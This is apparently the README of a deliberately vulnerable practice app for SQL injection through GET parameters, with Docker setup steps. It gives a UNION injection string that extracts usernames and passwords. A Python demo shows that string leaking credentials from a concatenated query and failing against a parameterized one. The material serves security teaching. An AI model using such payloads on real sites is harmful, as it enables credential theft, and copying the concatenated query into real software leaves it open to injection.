SQL GET Injection


An example web application that can be hacked using an SQL injection attack. The app uses a MySQL database, and parameters are sent as GET parameters.

Simply use this search query (for example):

abc' union select null, username, password from users where username like '%
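
The search described above, reproduced as an added example that is not the application's own code: it assumes a three-column product search built by string concatenation, with hypothetical table names and constructed rows, and uses Python's sqlite3 in place of the app's MySQL so it runs offline. It shows the README's search query returning rows from users, and the same input matching nothing once the value is bound as a parameter.

```python
import sqlite3

# Search query quoted from the README above.
PAYLOAD = "abc' union select null, username, password from users where username like '%"


def make_db():
    """Build an in-memory database; schema and rows are constructed for this example."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, description TEXT);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'abc cable', 'USB cable');
        INSERT INTO users VALUES (1, 'admin', 'constructed-secret');
    """)
    return db


def search_vulnerable(db, term):
    # Assumed shape of the vulnerable query: the GET value is concatenated
    # into the SQL text, so a quote in `term` closes the string literal and
    # the remainder is parsed as SQL.
    sql = "SELECT id, name, description FROM products WHERE name LIKE '%" + term + "%'"
    return db.execute(sql).fetchall()


def search_parameterized(db, term):
    # The value is bound separately from the SQL text, so it is only ever
    # compared as data and cannot change the statement's structure.
    sql = "SELECT id, name, description FROM products WHERE name LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for fn in (search_vulnerable, search_parameterized):
        print(fn.__name__, "normal :", fn(db, "abc"))
        print(fn.__name__, "payload:", fn(db, PAYLOAD))
```

The trailing `like '%` in the search query exists to absorb the `%'` that the concatenated query appends, which is why the statement still parses.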


Run with docker-compose

You can run the vulnerable app using docker-compose:

mkdir sql-get-injection
cd sql-get-injection
curl -o docker-compose.yml https://gitlab.cylab.be/cylab/play/sql-get-injection/-/raw/main/docker-compose.yml
docker-compose up

After a few seconds, the app will be available at http://127.0.0.1:8000

Local testing

The repository has a docker-compose-dev.yml that you can use to test or contribute:

git clone https://gitlab.cylab.be/cylab/play/sql-get-injection.git
cd sql-get-injection
docker-compose -f docker-compose-dev.yml up